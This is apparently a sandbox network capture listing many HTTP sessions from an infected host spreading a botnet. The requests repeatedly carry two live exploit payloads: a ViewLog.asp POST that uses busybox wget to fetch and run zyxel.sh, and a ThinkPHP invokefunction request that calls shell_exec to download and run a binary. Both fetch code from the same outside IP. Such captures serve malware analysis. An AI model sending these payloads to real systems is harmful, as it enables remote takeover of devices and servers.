                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            404192.168.2.234898494.122.69.1188080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:45.855186939 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            405192.168.2.233710894.130.64.2168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.029469013 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.239415884 CET490INHTTP/1.1 400 Bad Request
                                                            Content-Type: text/html; charset=us-ascii
                                                            Server: Microsoft-HTTPAPI/2.0
                                                            Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                            Connection: close
                                                            Content-Length: 311
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 30 2e 20 54 68 65 20 72 65 71 75 65 73 74 20 69 73 20 62 61 64 6c 79 20 66 6f 72 6d 65 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Bad Request</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Bad Request</h2><hr><p>HTTP Error 400. The request is badly formed.</p></BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            406192.168.2.233739285.253.71.1958080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.072762966 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            407192.168.2.235888694.122.235.08080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.099612951 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            408192.168.2.233979862.29.123.2218080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.099725008 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            409192.168.2.235895694.123.137.2438080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.099987030 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            410192.168.2.233426231.200.93.1288080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.101818085 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            411192.168.2.235253285.194.33.238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.280010939 CET167INHTTP/1.1 400 Bad Request
                                                            Server: micro_httpd
                                                            Cache-Control: no-cache
                                                            Date: Wed, 14 Feb 2024 09:32:25 GMT
                                                            Content-Type: text/html
                                                            Connection: close


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            412192.168.2.235499885.133.137.2408080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:46.362879038 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:46.695878029 CET158INHTTP/1.1 404 Not Found
                                                            Content-Type: text/plain
                                                            Date: Wed, 14 Feb 2024 08:28:46 GMT
                                                            Content-Length: 18
                                                            Connection: close
                                                            Data Raw: 34 30 34 20 70 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64
                                                            Data Ascii: 404 page not found


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            413192.168.2.2360406112.185.241.21980
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.141633987 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:48.604656935 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:50.300328016 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:53.691871881 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:00.602886915 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:14.168983936 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:29:42.580985069 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            414192.168.2.2358592112.13.125.2680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.277311087 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:47.692383051 CET482INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: cache13.cn1576[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017078993275247729e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            415192.168.2.236077695.101.83.8680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.356183052 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:47.570914030 CET480INHTTP/1.0 400 Bad Request
                                                            Server: AkamaiGHost
                                                            Mime-Version: 1.0
                                                            Content-Type: text/html
                                                            Content-Length: 258
                                                            Expires: Wed, 14 Feb 2024 08:28:47 GMT
                                                            Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                            Connection: close
                                                            Data Raw: 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 0a 3c 54 49 54 4c 45 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 54 49 54 4c 45 3e 0a 3c 2f 48 45 41 44 3e 3c 42 4f 44 59 3e 0a 3c 48 31 3e 49 6e 76 61 6c 69 64 20 55 52 4c 3c 2f 48 31 3e 0a 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 22 68 74 74 70 26 23 35 38 3b 26 23 34 37 3b 26 23 34 37 3b 26 23 33 37 3b 35 62 4e 6f 26 23 33 37 3b 32 30 48 6f 73 74 26 23 33 37 3b 35 64 26 23 34 37 3b 69 6e 64 65 78 26 23 34 36 3b 70 68 70 26 23 36 33 3b 22 2c 20 69 73 20 69 6e 76 61 6c 69 64 2e 3c 70 3e 0a 52 65 66 65 72 65 6e 63 65 26 23 33 32 3b 26 23 33 35 3b 39 26 23 34 36 3b 31 33 63 39 31 30 30 32 26 23 34 36 3b 31 37 30 37 38 39 39 33 32 37 26 23 34 36 3b 65 64 31 65 31 33 30 34 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0a
                                                            Data Ascii: <HTML><HEAD><TITLE>Invalid URL</TITLE></HEAD><BODY><H1>Invalid URL</H1>The requested URL "http&#58;&#47;&#47;&#37;5bNo&#37;20Host&#37;5d&#47;index&#46;php&#63;", is invalid.<p>Reference&#32;&#35;9&#46;13c91002&#46;1707899327&#46;ed1e1304</BODY></HTML>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            416192.168.2.235101495.82.231.19080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.397000074 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:48.732592106 CET331OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:48.988050938 CET339INHTTP/1.1 400 Bad Request
                                                            Server: nginx/1.18.0 (Ubuntu)
                                                            Date: Wed, 14 Feb 2024 08:28:48 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 166
                                                            Connection: close
                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            417192.168.2.2358594112.13.125.2680
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.559679985 CET319OUTGET /index.php?s=/index/hinkpp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]='wget http://141.98.10.72/bins/x86 -O thonkphp ; chmod 777 thonkphp ; ./thonkphp ThinkPHP ; rm -rf thinkphp' HTTP/1.1
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: /
                                                            User-Agent: Uirusu/2.0
                                                            Feb 14, 2024 09:28:47.955646038 CET482INHTTP/1.1 400 Bad Request
                                                            Server: Tengine
                                                            Date: Wed, 14 Feb 2024 08:28:47 GMT
                                                            Content-Type: text/html
                                                            Content-Length: 249
                                                            Connection: close
                                                            Via: cache10.cn1576[,0]
                                                            Timing-Allow-Origin: *
                                                            EagleId: 0000000017078993277842855e
                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 0d 0a 3c 70 3e 59 6f 75 72 20 62 72 6f 77 73 65 72 20 73 65 6e 74 20 61 20 72 65 71 75 65 73 74 20 74 68 61 74 20 74 68 69 73 20 73 65 72 76 65 72 20 63 6f 75 6c 64 20 6e 6f 74 20 75 6e 64 65 72 73 74 61 6e 64 2e 3c 68 72 2f 3e 50 6f 77 65 72 65 64 20 62 79 20 54 65 6e 67 69 6e 65 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>400 Bad Request</title></head><body><h1>400 Bad Request</h1><p>Your browser sent a request that this server could not understand.<hr/>Powered by Tengine</body></html>


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            418192.168.2.235328095.217.148.1168080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.940578938 CET326OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            419192.168.2.234115094.122.11.238080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.964478970 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            420192.168.2.234188462.29.123.2558080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.966269016 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            421192.168.2.233692031.200.84.1568080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:47.968415976 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh


                                                            Session IDSource IPSource PortDestination IPDestination Port
                                                            422192.168.2.235386431.136.120.1498080
                                                            TimestampBytes transferredDirectionData
                                                            Feb 14, 2024 09:28:48.142702103 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
                                                            Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 34 31 2e 39 38 2e 31 30 2e 37 32 2f 7a 79 78 65 6c 2e 73 68 3b 20 63 68 6d 6f 64 20 2b 78 20 7a 79 78 65 6c 2e 73 68 3b 20 2e 2f 7a 79 78 65 6c 2e 73 68
                                                            Data Ascii: /bin/busybox wget http://141.98.10.72/zyxel.sh; chmod +x zyxel.sh; ./zyxel.sh
                                                            Feb 14, 2024 09:28:48.764530897 CET314OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                                            Host: 192.168.0.14:80
                                                            Connection: keep-alive
                                                            Accept-Encoding: gzip, deflate
                                                            Accept: */*
                                                            User-Agent: python-requests/2.20.0
                                                            Content-Length: 227
                                                            Content-Type: application/x-www-form-urlencoded
